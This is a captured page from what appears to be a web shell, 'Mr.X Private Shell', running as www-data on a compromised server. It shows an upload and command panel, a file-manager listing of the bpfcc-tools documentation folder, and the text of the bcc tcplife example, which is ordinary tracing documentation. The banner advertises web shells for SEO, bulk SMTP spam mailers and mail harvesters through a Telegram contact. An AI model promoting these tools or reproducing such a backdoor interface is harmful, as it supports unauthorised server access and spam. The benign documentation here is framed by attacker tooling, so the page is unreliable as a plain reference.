__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        

            For_More_Tools:
            
                Telegram: @jackleet | Bulk Smtp support mail sender  | Business Mail Collector  |  Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private

Upload:

Command:

www-data@216.73.216.10: ~ $ 
Demonstrations of tcplife, the Linux BPF/bcc version.


tcplife summarizes TCP sessions that open and close while tracing. For example:

# ./tcplife
PID   COMM       LADDR           LPORT RADDR           RPORT TX_KB RX_KB MS
22597 recordProg 127.0.0.1       46644 127.0.0.1       28527     0     0 0.23
3277  redis-serv 127.0.0.1       28527 127.0.0.1       46644     0     0 0.28
22598 curl       100.66.3.172    61620 52.205.89.26    80        0     1 91.79
22604 curl       100.66.3.172    44400 52.204.43.121   80        0     1 121.38
22624 recordProg 127.0.0.1       46648 127.0.0.1       28527     0     0 0.22
3277  redis-serv 127.0.0.1       28527 127.0.0.1       46648     0     0 0.27
22647 recordProg 127.0.0.1       46650 127.0.0.1       28527     0     0 0.21
3277  redis-serv 127.0.0.1       28527 127.0.0.1       46650     0     0 0.26
[...]

This caught a program, "recordProg" making a few short-lived TCP connections
to "redis-serv", lasting about 0.25 milliseconds each connection. A couple of
"curl" sessions were also traced, connecting to port 80, and lasting 91 and 121
milliseconds.

This tool is useful for workload characterisation and flow accounting:
identifying what connections are happening, with the bytes transferred.


Process names are truncated to 10 characters. By using the wide option, -w,
the column width becomes 16 characters. The IP address columns are also wider
to fit IPv6 addresses:

# ./tcplife -w
PID   COMM             IP LADDR                      LPORT RADDR                      RPORT  TX_KB  RX_KB MS
26315 recordProgramSt  4  127.0.0.1                  44188 127.0.0.1                  28527      0      0 0.21
3277  redis-server     4  127.0.0.1                  28527 127.0.0.1                  44188      0      0 0.26
26320 ssh              6  fe80::8a3:9dff:fed5:6b19   22440 fe80::8a3:9dff:fed5:6b19   22         1      1 457.52
26321 sshd             6  fe80::8a3:9dff:fed5:6b19   22    fe80::8a3:9dff:fed5:6b19   22440      1      1 458.69
26341 recordProgramSt  4  127.0.0.1                  44192 127.0.0.1                  28527      0      0 0.27
3277  redis-server     4  127.0.0.1                  28527 127.0.0.1                  44192      0      0 0.32


In this example, I uploaded a 10 Mbyte file to the server, and then downloaded
it again, using scp:

# ./tcplife
PID   COMM       LADDR           LPORT RADDR           RPORT TX_KB RX_KB MS
7715  recordProg 127.0.0.1       50894 127.0.0.1       28527     0     0 0.25
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50894     0     0 0.30
7619  sshd       100.66.3.172    22    100.127.64.230  63033     5 10255 3066.79
7770  recordProg 127.0.0.1       50896 127.0.0.1       28527     0     0 0.20
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50896     0     0 0.24
7793  recordProg 127.0.0.1       50898 127.0.0.1       28527     0     0 0.23
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50898     0     0 0.27
7847  recordProg 127.0.0.1       50900 127.0.0.1       28527     0     0 0.24
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50900     0     0 0.29
7870  recordProg 127.0.0.1       50902 127.0.0.1       28527     0     0 0.29
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50902     0     0 0.30
7798  sshd       100.66.3.172    22    100.127.64.230  64925 10265     6 2176.15
[...]

You can see the 10 Mbytes received by sshd, and then later transmitted. Looks
like receive was slower (3.07 seconds) than transmit (2.18 seconds).


Timestamps can be added with -t:

# ./tcplife -t
TIME(s)   PID   COMM       LADDR           LPORT RADDR           RPORT TX_KB RX_KB MS
0.000000  5973  recordProg 127.0.0.1       47986 127.0.0.1       28527     0     0 0.25
0.000059  3277  redis-serv 127.0.0.1       28527 127.0.0.1       47986     0     0 0.29
1.022454  5996  recordProg 127.0.0.1       47988 127.0.0.1       28527     0     0 0.23
1.022513  3277  redis-serv 127.0.0.1       28527 127.0.0.1       47988     0     0 0.27
2.044868  6019  recordProg 127.0.0.1       47990 127.0.0.1       28527     0     0 0.24
2.044924  3277  redis-serv 127.0.0.1       28527 127.0.0.1       47990     0     0 0.28
3.069136  6042  recordProg 127.0.0.1       47992 127.0.0.1       28527     0     0 0.22
3.069204  3277  redis-serv 127.0.0.1       28527 127.0.0.1       47992     0     0 0.28

This shows that the recordProg process was connecting once per second.

There's also a -T for HH:MM:SS formatted times.


There's a comma separated values mode, -s. Here it is with both -t and -T
timestamps:

# ./tcplife -stT
TIME,TIME(s),PID,COMM,IP,LADDR,LPORT,RADDR,RPORT,TX_KB,RX_KB,MS
23:39:38,0.000000,7335,recordProgramSt,4,127.0.0.1,48098,127.0.0.1,28527,0,0,0.26
23:39:38,0.000064,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48098,0,0,0.32
23:39:39,1.025078,7358,recordProgramSt,4,127.0.0.1,48100,127.0.0.1,28527,0,0,0.25
23:39:39,1.025141,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48100,0,0,0.30
23:39:41,2.040949,7381,recordProgramSt,4,127.0.0.1,48102,127.0.0.1,28527,0,0,0.24
23:39:41,2.041011,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48102,0,0,0.29
23:39:42,3.067848,7404,recordProgramSt,4,127.0.0.1,48104,127.0.0.1,28527,0,0,0.30
23:39:42,3.067914,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48104,0,0,0.35
[...]


There are options for filtering on local and remote ports. Here is filtering
on local ports 22 and 80:

# ./tcplife.py -L 22,80
PID   COMM       LADDR           LPORT RADDR           RPORT TX_KB RX_KB MS
8301  sshd       100.66.3.172    22    100.127.64.230  58671     3     3 1448.52
[...]


USAGE:

# ./tcplife.py -h
usage: tcplife.py [-h] [-T] [-t] [-w] [-s] [-p PID] [-L LOCALPORT]
                  [-D REMOTEPORT] [-4 | -6]

Trace the lifespan of TCP sessions and summarize

optional arguments:
  -h, --help            show this help message and exit
  -T, --time            include time column on output (HH:MM:SS)
  -t, --timestamp       include timestamp on output (seconds)
  -w, --wide            wide column output (fits IPv6 addresses)
  -s, --csv             comma separated values output
  -p PID, --pid PID     trace this PID only
  -L LOCALPORT, --localport LOCALPORT
                        comma-separated list of local ports to trace.
  -D REMOTEPORT, --remoteport REMOTEPORT
                        comma-separated list of remote ports to trace.
  -4, --ipv4            trace IPv4 family only
  -6, --ipv6            trace IPv6 family only

examples:
    ./tcplife           # trace all TCP connect()s
    ./tcplife -t        # include time column (HH:MM:SS)
    ./tcplife -w        # wider columns (fit IPv6)
    ./tcplife -stT      # csv output, with times & timestamps
    ./tcplife -p 181    # only trace PID 181
    ./tcplife -L 80     # only trace local port 80
    ./tcplife -L 80,81  # only trace local ports 80 and 81
    ./tcplife -D 80     # only trace remote port 80
    ./tcplife -4        # only trace IPv4 family
    ./tcplife -6        # only trace IPv6 family

Filemanager

DIR : / usr/ share/ doc/ bpfcc-tools/ examples/ doc/
Name Type Size Permission Actions
lib Folder 0755
argdist_example.txt File 22.49 KB 0644
bashreadline_example.txt File 882 B 0644
bindsnoop_example.txt File 4.42 KB 0644
biolatency_example.txt File 23.46 KB 0644
biolatpcts_example.txt File 2.97 KB 0644
biopattern_example.txt File 1.37 KB 0644
biosnoop_example.txt File 3.47 KB 0644
biotop_example.txt File 9.11 KB 0644
bitesize_example.txt File 4.98 KB 0644
bpflist_example.txt File 2.13 KB 0644
btrfsdist_example.txt File 9.32 KB 0644
btrfsslower_example.txt File 6.65 KB 0644
cachestat_example.txt File 3.92 KB 0644
cachetop_example.txt File 3.83 KB 0644
capable_example.txt File 6.5 KB 0644
cobjnew_example.txt File 2.97 KB 0644
compactsnoop_example.txt File 9.92 KB 0644
cpudist_example.txt File 16.48 KB 0644
cpuunclaimed_example.txt File 15.2 KB 0644
criticalstat_example.txt File 4.81 KB 0644
cthreads_example.txt File 2.08 KB 0644
dbslower_example.txt File 3.89 KB 0644
dbstat_example.txt File 6.5 KB 0644
dcsnoop_example.txt File 4.27 KB 0644
dcstat_example.txt File 3.26 KB 0644
deadlock_example.txt File 16.25 KB 0644
dirtop_example.txt File 4.98 KB 0644
drsnoop_example.txt File 5 KB 0644
execsnoop_example.txt File 6.64 KB 0644
exitsnoop_example.txt File 6.22 KB 0644
ext4dist_example.txt File 8.78 KB 0644
ext4slower_example.txt File 11.07 KB 0644
filegone_example.txt File 743 B 0644
filelife_example.txt File 2.04 KB 0644
fileslower_example.txt File 5.58 KB 0644
filetop_example.txt File 6.8 KB 0644
funccount_example.txt File 13.29 KB 0644
funcinterval_example.txt File 15.28 KB 0644
funclatency_example.txt File 20.98 KB 0644
funcslower_example.txt File 6.63 KB 0644
gethostlatency_example.txt File 1.29 KB 0644
hardirqs_example.txt File 37.05 KB 0644
inject_example.txt File 6.67 KB 0644
javacalls_example.txt File 3.91 KB 0644
javaflow_example.txt File 5.88 KB 0644
javagc_example.txt File 3.78 KB 0644
javaobjnew_example.txt File 2.97 KB 0644
javastat_example.txt File 2.98 KB 0644
javathreads_example.txt File 2.08 KB 0644
killsnoop_example.txt File 1.31 KB 0644
klockstat_example.txt File 8.34 KB 0644
kvmexit_example.txt File 11.63 KB 0644
llcstat_example.txt File 3.24 KB 0644
mdflush_example.txt File 1.74 KB 0644
memleak_example.txt File 10.02 KB 0644
mountsnoop_example.txt File 1.45 KB 0644
mysqld_qslower_example.txt File 2.3 KB 0644
netqtop_example.txt File 12.2 KB 0644
nfsdist_example.txt File 8.31 KB 0644
nfsslower_example.txt File 7.68 KB 0644
nodegc_example.txt File 3.78 KB 0644
nodestat_example.txt File 2.98 KB 0644
offcputime_example.txt File 19.2 KB 0644
offwaketime_example.txt File 37.36 KB 0644
oomkill_example.txt File 1.88 KB 0644
opensnoop_example.txt File 10.33 KB 0644
perlcalls_example.txt File 3.91 KB 0644
perlflow_example.txt File 5.88 KB 0644
perlstat_example.txt File 2.98 KB 0644
phpcalls_example.txt File 3.91 KB 0644
phpflow_example.txt File 5.88 KB 0644
phpstat_example.txt File 2.98 KB 0644
pidpersec_example.txt File 677 B 0644
ppchcalls_example.txt File 6.93 KB 0644
profile_example.txt File 31.08 KB 0644
pythoncalls_example.txt File 3.91 KB 0644
pythonflow_example.txt File 5.88 KB 0644
pythongc_example.txt File 3.78 KB 0644
pythonstat_example.txt File 2.98 KB 0644
rdmaucma_example.txt File 1.94 KB 0644
readahead_example.txt File 3.17 KB 0644
reset-trace_example.txt File 9.15 KB 0644
rubycalls_example.txt File 3.91 KB 0644
rubyflow_example.txt File 5.88 KB 0644
rubygc_example.txt File 3.78 KB 0644
rubyobjnew_example.txt File 2.97 KB 0644
rubystat_example.txt File 2.98 KB 0644
runqlat_example.txt File 31.3 KB 0644
runqlen_example.txt File 11.85 KB 0644
runqslower_example.txt File 2.13 KB 0644
shmsnoop_example.txt File 2.73 KB 0644
slabratetop_example.txt File 5.22 KB 0644
sofdsnoop_example.txt File 3.14 KB 0644
softirqs_example.txt File 11.02 KB 0644
solisten_example.txt File 2.3 KB 0644
sslsniff_example.txt File 6.74 KB 0644
stackcount_example.txt File 21.45 KB 0644
statsnoop_example.txt File 3.02 KB 0644
swapin.txt File 2.57 KB 0644
swapin_example.txt File 1.39 KB 0644
syncsnoop_example.txt File 387 B 0644
syscount_example.txt File 6.27 KB 0644
tclcalls_example.txt File 3.91 KB 0644
tclflow_example.txt File 5.88 KB 0644
tclobjnew_example.txt File 2.97 KB 0644
tclstat_example.txt File 2.98 KB 0644
tcpaccept_example.txt File 2.76 KB 0644
tcpcong_example.txt File 33.31 KB 0644
tcpconnect_example.txt File 6.27 KB 0644
tcpconnlat_example.txt File 2.55 KB 0644
tcpdrop_example.txt File 1.95 KB 0644
tcplife_example.txt File 6.83 KB 0644
tcpretrans_example.txt File 3.85 KB 0644
tcprtt_example.txt File 9.83 KB 0644
tcpstates_example.txt File 2.84 KB 0644
tcpsubnet_example.txt File 5.37 KB 0644
tcpsynbl_example.txt File 1.15 KB 0644
tcptop_example.txt File 5.75 KB 0644
tcptracer_example.txt File 1.98 KB 0644
threadsnoop_example.txt File 1.07 KB 0644
tplist_example.txt File 4.4 KB 0644
trace_example.txt File 21.62 KB 0644
ttysnoop_example.txt File 3.24 KB 0644
vfscount_example.txt File 2.17 KB 0644
vfsstat_example.txt File 1.66 KB 0644
virtiostat_example.txt File 2.62 KB 0644
wakeuptime_example.txt File 33.25 KB 0644
xfsdist_example.txt File 6.77 KB 0644
xfsslower_example.txt File 6.91 KB 0644
zfsdist_example.txt File 9.52 KB 0644
zfsslower_example.txt File 7.37 KB 0644

Copyright reserved © 2026 xtooler.online Shell Coded By Mr.X

Filemanager